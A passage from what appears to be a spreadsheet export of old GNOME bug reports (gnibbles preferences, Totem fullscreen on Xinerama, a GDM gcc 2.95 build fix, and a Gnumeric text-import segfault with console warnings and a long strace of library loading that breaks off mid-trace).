the complete path would be too long. The id in the db looks fine. Could be
printed in hex form to make it shorter (or in base 36 mapped to 0-9a-z). Patch
applies cleanly after applying patch for #335929 will be fuzzy else (only line
numbers changed).</t>
  </si>
  <si>
    <t>jcdubacq1</t>
  </si>
  <si>
    <t>GNOME-GAMES-SUPERSEDED-90569</t>
  </si>
  <si>
    <t>gnibbles preferences bummered</t>
  </si>
  <si>
    <t>If you cancel the preferences in gnibbles they aren't saved next time you
load gnibbles (good!) but they do appear each time you open the preferences
dialog until you shut down the program (bad).</t>
  </si>
  <si>
    <t>TOTEM-487932</t>
  </si>
  <si>
    <t>The plug-in always fullscreens on the head where it was initially launched</t>
  </si>
  <si>
    <t>Please describe the problem:
In xinerama setups there is no way to make the plug-in fullscreen on any other head than the one where it was initially launched.
It is of course possible to launch totem from the plug-in move it to the desired head and then fullscreen totem. But I think a better solution would be for the plug-in to always fullscreen on the head where the video is currently playing.
Steps to reproduce:
Actual results:
Expected results:
Does this happen every time?
Other information:</t>
  </si>
  <si>
    <t>totem-browser-maint</t>
  </si>
  <si>
    <t>vorgaard.c</t>
  </si>
  <si>
    <t>GDM-311097</t>
  </si>
  <si>
    <t>Fix build with gcc 2.95 (again)</t>
  </si>
  <si>
    <t>Version details: 2.8.0.1
The attached patch gets rid of the C99isms newly introduced in 2.8.0.1.</t>
  </si>
  <si>
    <t>GNUMERIC-109076</t>
  </si>
  <si>
    <t>Segfault: when importing text entering fixed column width -&gt; click Add</t>
  </si>
  <si>
    <t>Using gedit to open the original data (text) file in question (contents at
end of this message) select all then copy. Go to gnumeric select
paste on one of my sheets. gnumeric asks me what to do with the plain
text (thanks -) - I choose fixed width on original data type. Then
click forward. I choose a column width of 7. I click Add and I get a
segfault console output below:
csirac@singularity-3:/mnt/rondor/cave/csirac$ strace -o strace gnumeric
(gnumeric:13661): libglade-WARNING **: Error loading image: Failed to open
file '/usr/share/gnumeric/1.1.16-bonobo/glade/stf-druid.png': No such file
or directory
(gnumeric:13661): libglade-WARNING **: could not convert string to type
`GdkPixbuf' for property `logo'
(gnumeric:13661): libglade-WARNING **: Error loading image: Failed to open
file '/usr/share/gnumeric/1.1.16-bonobo/glade/stf-druid.png': No such file
or directory
(gnumeric:13661): libglade-WARNING **: could not convert string to type
`GdkPixbuf' for property `logo'
(gnumeric:13661): libglade-WARNING **: Error loading image: Failed to open
file '/usr/share/gnumeric/1.1.16-bonobo/glade/stf-druid.png': No such file
or directory
(gnumeric:13661): libglade-WARNING **: could not convert string to type
`GdkPixbuf' for property `logo'
(gnumeric:13661): libglade-WARNING **: Unknown CList child property: visible
(gnumeric:13661): libglade-WARNING **: Error loading image: Failed to open
file '/usr/share/gnumeric/1.1.16-bonobo/glade/stf-druid.png': No such file
or directory
(gnumeric:13661): libglade-WARNING **: could not convert string to type
`GdkPixbuf' for property `logo'
(gnumeric:13661): libglade-WARNING **: Unknown CList child property: visible
(gnumeric:13661): libglade-WARNING **: Unknown CList child property: visible
** (gnumeric:13661): WARNING **: Unknown trim type selected
csirac@singularity-3:/mnt/rondor/cave/csirac$ 
Above output is exactly what appears the moment before I click add. After
I click Add I get the gnome segfault requester and no more output appears
on the console.
This happens on blank sheet.
Here is the strace output:
execve(/usr/bin/gnumeric [gnumeric] [/* 24 vars */]) = 0
uname({sys=Linux node=singularity ...}) = 0
brk(0)                                  = 0x8257c98
open(/etc/ld.so.preload O_RDONLY)    = -1 ENOENT (No such file or directory)
open(/etc/ld.so.cache O_RDONLY)      = 3
fstat64(3 {st_mode=S_IFREG|0644 st_size=41629 ...}) = 0
old_mmap(NULL 41629 PROT_READ MAP_PRIVATE 3 0) = 0x40012000
close(3)                                = 0
open(/usr/lib/libgal-2.0.so.1 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\374+\2... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=828992 ...}) = 0
old_mmap(NULL 828472 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x4001d000
mprotect(0x400e0000 29752 PROT_NONE)  = 0
old_mmap(0x400e0000 32768 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0xc3000) = 0x400e0000
close(3)                                = 0
open(/usr/lib/libglade-2.0.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360g\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=77692 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1
0) = 0x400e8000
old_mmap(NULL 80824 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x400e9000
mprotect(0x400fc000 3000 PROT_NONE)   = 0
old_mmap(0x400fc000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x12000) = 0x400fc000
close(3)                                = 0
open(/usr/lib/libgnomeui-2.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\200\1... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=508400 ...}) = 0
old_mmap(NULL 507508 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x400fd000
mprotect(0x40176000 11892 PROT_NONE)  = 0
old_mmap(0x40176000 12288 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x79000) = 0x40176000
close(3)                                = 0
open(/usr/lib/libjpeg.so.62 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300$\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=113372 ...}) = 0
old_mmap(NULL 116432 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40179000
mprotect(0x40195000 1744 PROT_NONE)   = 0
old_mmap(0x40195000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x1b000) = 0x40195000
close(3)                                = 0
open(/usr/X11R6/lib/libSM.so.6 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320 \0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0755 st_size=37343 ...}) = 0
old_mmap(NULL 30288 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40196000
mprotect(0x4019d000 1616 PROT_NONE)   = 0
old_mmap(0x4019d000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x7000) = 0x4019d000
close(3)                                = 0
open(/usr/X11R6/lib/libICE.so.6 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\2204\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0755 st_size=91397 ...}) = 0
old_mmap(NULL 87856 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x4019e000
mprotect(0x401b1000 10032 PROT_NONE)  = 0
old_mmap(0x401b1000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x12000) = 0x401b1000
old_mmap(0x401b2000 5936 PROT_READ|PROT_WRITE
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x401b2000
close(3)                                = 0
open(/usr/lib/libgnomeprintui-2-2.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\354\204... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=124840 ...}) = 0
old_mmap(NULL 127964 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x401b4000
mprotect(0x401d2000 5084 PROT_NONE)   = 0
old_mmap(0x401d2000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x1d000) = 0x401d2000
close(3)                                = 0
open(/usr/lib/libgnomeprint-2-2.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\354\275... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=344720 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1
0) = 0x401d4000
old_mmap(NULL 4422072 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x401d5000
mprotect(0x40228000 4082104 PROT_NONE) = 0
old_mmap(0x40228000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x52000) = 0x40228000
old_mmap(0x4022a000 4073912 PROT_READ|PROT_WRITE
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x4022a000
close(3)                                = 0
open(/usr/X11R6/lib/libfontconfig.so.1 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320y\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0755 st_size=165757 ...}) = 0
old_mmap(NULL 140228 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x4060d000
mprotect(0x4062c000 13252 PROT_NONE)  = 0
old_mmap(0x4062c000 12288 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x1f000) = 0x4062c000
old_mmap(0x4062f000 964 PROT_READ|PROT_WRITE
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x4062f000
close(3)                                = 0
open(/usr/lib/libfreetype.so.6 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0004|\0\000...
1024) = 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=320268 ...}) = 0
old_mmap(NULL 323328 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40630000
mprotect(0x4067b000 16128 PROT_NONE)  = 0
old_mmap(0x4067b000 16384 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x4a000) = 0x4067b000
close(3)                                = 0
open(/usr/lib/libbonoboui-2.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320Y\1... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=359152 ...}) = 0
old_mmap(NULL 358364 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x4067f000
mprotect(0x406d4000 10204 PROT_NONE)  = 0
old_mmap(0x406d4000 12288 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x55000) = 0x406d4000
close(3)                                = 0
open(/usr/lib/libgnomecanvas-2.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\202... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=163712 ...}) = 0
old_mmap(NULL 162800 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x406d7000
mprotect(0x406fe000 3056 PROT_NONE)   = 0
old_mmap(0x406fe000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x27000) = 0x406fe000
close(3)                                = 0
open(/usr/lib/libgnome-2.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\220S\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=73264 ...}) = 0
old_mmap(NULL 72320 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x406ff000
mprotect(0x40710000 2688 PROT_NONE)   = 0
old_mmap(0x40710000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x11000) = 0x40710000
close(3)                                = 0
open(/usr/lib/libesd.so.0 O_RDONLY)  = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\304\37... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=31468 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1
0) = 0x40711000
old_mmap(NULL 30432 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40712000
mprotect(0x40719000 1760 PROT_NONE)   = 0
old_mmap(0x40719000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x7000) = 0x40719000
close(3)                                = 0
open(/usr/lib/libaudiofile.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\320S\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=119344 ...}) = 0
old_mmap(NULL 122468 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x4071a000
mprotect(0x40735000 11876 PROT_NONE)  = 0
old_mmap(0x40735000 12288 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x1a000) = 0x40735000
close(3)                                = 0
open(/usr/lib/libart_lgpl_2.so.2 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\304#\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=80004 ...}) = 0
old_mmap(NULL 83068 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40738000
mprotect(0x4074c000 1148 PROT_NONE)   = 0
old_mmap(0x4074c000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x13000) = 0x4074c000
close(3)                                = 0
open(/usr/lib/libpangoft2-1.0.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0lQ\0\000... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=126288 ...}) = 0
old_mmap(NULL 125396 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x4074d000
mprotect(0x4076b000 2516 PROT_NONE)   = 0
old_mmap(0x4076b000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x1e000) = 0x4076b000
close(3)                                = 0
open(/usr/lib/libgtk-x11-2.0.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\210\320... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=2131408 ...}) = 0
old_mmap(NULL 2139400 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x4076c000
mprotect(0x4096c000 42248 PROT_NONE)  = 0
old_mmap(0x4096c000 36864 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x200000) = 0x4096c000
old_mmap(0x40975000 5384 PROT_READ|PROT_WRITE
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x40975000
close(3)                                = 0
open(/usr/lib/libgdk-x11-2.0.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\3708\1... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=404220 ...}) = 0
old_mmap(NULL 403248 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40977000
mprotect(0x409d5000 18224 PROT_NONE)  = 0
old_mmap(0x409d5000 20480 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x5e000) = 0x409d5000
close(3)                                = 0
open(/usr/lib/libatk-1.0.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\\Y\0\000...
1024) = 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=86448 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1
0) = 0x409da000
old_mmap(NULL 89792 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x409db000
mprotect(0x409ef000 7872 PROT_NONE)   = 0
old_mmap(0x409ef000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x13000) = 0x409ef000
close(3)                                = 0
open(/usr/lib/libgdk_pixbuf-2.0.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\300+\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=66064 ...}) = 0
old_mmap(NULL 69136 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x409f1000
mprotect(0x40a01000 3600 PROT_NONE)   = 0
old_mmap(0x40a01000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0xf000) = 0x40a01000
close(3)                                = 0
open(/usr/lib/libpangoxft-1.0.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0DM\0\000... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=121488 ...}) = 0
old_mmap(NULL 120472 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40a02000
mprotect(0x40a1f000 1688 PROT_NONE)   = 0
old_mmap(0x40a1f000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x1d000) = 0x40a1f000
close(3)                                = 0
open(/usr/lib/libpangox-1.0.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p&gt;\0\000... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=44716 ...}) = 0
old_mmap(NULL 47792 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40a20000
mprotect(0x40a2b000 2736 PROT_NONE)   = 0
old_mmap(0x40a2b000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0xa000) = 0x40a2b000
close(3)                                = 0
open(/usr/lib/libpango-1.0.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\324\217... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=192244 ...}) = 0
old_mmap(NULL 191220 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40a2c000
mprotect(0x40a4f000 47860 PROT_NONE)  = 0
old_mmap(0x40a4f000 49152 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x23000) = 0x40a4f000
close(3)                                = 0
open(/usr/lib/libgnutls.so.5 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0D\321\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=204220 ...}) = 0
old_mmap(NULL 203200 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40a5b000
mprotect(0x40a88000 18880 PROT_NONE)  = 0
old_mmap(0x40a88000 20480 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x2d000) = 0x40a88000
close(3)                                = 0
open(/usr/lib/libtasn1.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0` \0\000... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=53444 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1
0) = 0x40a8d000
old_mmap(NULL 57092 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40a8e000
mprotect(0x40a9b000 3844 PROT_NONE)   = 0
old_mmap(0x40a9b000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0xc000) = 0x40a9b000
close(3)                                = 0
open(/usr/lib/libgcrypt.so.1 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\2400\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=227344 ...}) = 0
old_mmap(NULL 232144 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40a9c000
mprotect(0x40ad2000 10960 PROT_NONE)  = 0
old_mmap(0x40ad2000 12288 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x35000) = 0x40ad2000
close(3)                                = 0
open(/lib/libnsl.so.1 O_RDONLY)      = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0d\0\000... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=69132 ...}) = 0
old_mmap(NULL 76448 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40ad5000
mprotect(0x40ae5000 10912 PROT_NONE)  = 0
old_mmap(0x40ae5000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x10000) = 0x40ae5000
old_mmap(0x40ae6000 6816 PROT_READ|PROT_WRITE
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x40ae6000
close(3)                                = 0
open(/usr/lib/libgsf-gnome-1.so.1 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0(\24\0\000...
1024) = 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=14192 ...}) = 0
old_mmap(NULL 13156 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40ae8000
mprotect(0x40aeb000 868 PROT_NONE)    = 0
old_mmap(0x40aeb000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x3000) = 0x40aeb000
close(3)                                = 0
open(/usr/lib/libbonobo-2.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000v\1\000...
1024) = 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=320288 ...}) = 0
old_mmap(NULL 319316 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40aec000
mprotect(0x40b31000 36692 PROT_NONE)  = 0
old_mmap(0x40b31000 36864 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x45000) = 0x40b31000
close(3)                                = 0
open(/usr/lib/libORBitCosNaming-2.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\360\32... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=17216 ...}) = 0
old_mmap(NULL 16180 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40b3a000
mprotect(0x40b3d000 3892 PROT_NONE)   = 0
old_mmap(0x40b3d000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x3000) = 0x40b3d000
close(3)                                = 0
open(/usr/lib/libgnomevfs-2.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\364\263... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=203856 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1
0) = 0x40b3e000
old_mmap(NULL 207996 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40b3f000
mprotect(0x40b70000 7292 PROT_NONE)   = 0
old_mmap(0x40b70000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x30000) = 0x40b70000
close(3)                                = 0
open(/usr/lib/libgconf-2.so.4 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\354\256... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=149560 ...}) = 0
old_mmap(NULL 148524 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40b72000
mprotect(0x40b94000 9260 PROT_NONE)   = 0
old_mmap(0x40b94000 12288 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x22000) = 0x40b94000
close(3)                                = 0
open(/lib/librt.so.1 O_RDONLY)       = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0&lt;\32\0\000...
1024) = 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=26592 ...}) = 0
old_mmap(NULL 69012 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40b97000
mprotect(0x40b9d000 44436 PROT_NONE)  = 0
old_mmap(0x40b9d000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x6000) = 0x40b9d000
old_mmap(0x40b9e000 40340 PROT_READ|PROT_WRITE
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS -1 0) = 0x40b9e000
close(3)                                = 0
open(/usr/lib/libbonobo-activation.so.4 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0008d\0\000...
1024) = 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=69944 ...}) = 0
old_mmap(NULL 73040 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40ba8000
mprotect(0x40bb8000 7504 PROT_NONE)   = 0
old_mmap(0x40bb8000 8192 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0xf000) = 0x40bb8000
close(3)                                = 0
open(/usr/lib/libORBit-2.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\34\1\000...
1024) = 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=243076 ...}) = 0
old_mmap(NULL 242052 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40bba000
mprotect(0x40bed000 33156 PROT_NONE)  = 0
old_mmap(0x40bed000 36864 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x33000) = 0x40bed000
close(3)                                = 0
open(/lib/libpopt.so.0 O_RDONLY)     = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260\21... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=23976 ...}) = 0
old_mmap(NULL 27100 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40bf6000
mprotect(0x40bfc000 2524 PROT_NONE)   = 0
old_mmap(0x40bfc000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x5000) = 0x40bfc000
close(3)                                = 0
open(/usr/lib/liblinc.so.1 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\224#\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=27960 ...}) = 0
old_mmap(NULL 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_ANONYMOUS -1
0) = 0x40bfd000
old_mmap(NULL 26936 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40bfe000
mprotect(0x40c04000 2360 PROT_NONE)   = 0
old_mmap(0x40c04000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x6000) = 0x40c04000
close(3)                                = 0
open(/usr/lib/libgmodule-2.0.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\264\16... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=10184 ...}) = 0
old_mmap(NULL 13244 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40c05000
mprotect(0x40c08000 956 PROT_NONE)    = 0
old_mmap(0x40c08000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x2000) = 0x40c08000
close(3)                                = 0
open(/lib/libdl.so.2 O_RDONLY)       = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0S\27\0\000...
1024) = 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=7992 ...}) = 0
old_mmap(NULL 10924 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40c09000
mprotect(0x40c0b000 2732 PROT_NONE)   = 0
old_mmap(0x40c0b000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x1000) = 0x40c0b000
close(3)                                = 0
open(/usr/lib/libgthread-2.0.so.0 O_RDONLY) = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\314\23... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=13936 ...}) = 0
old_mmap(NULL 17016 PROT_READ|PROT_EXEC MAP_PRIVATE 3 0) = 0x40c0c000
mprotect(0x40c10000 632 PROT_NONE)    = 0
old_mmap(0x40c10000 4096 PROT_READ|PROT_WRITE MAP_PRIVATE|MAP_FIXED 3
0x3000) = 0x40c10000
close(3)                                = 0
open(/lib/libpthread.so.0 O_RDONLY)  = 3
read(3 \177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\224D\0... 1024)
= 1024
fstat64(3 {st_mode=S_IFREG|0644 st_size=81959 ...}) = 0
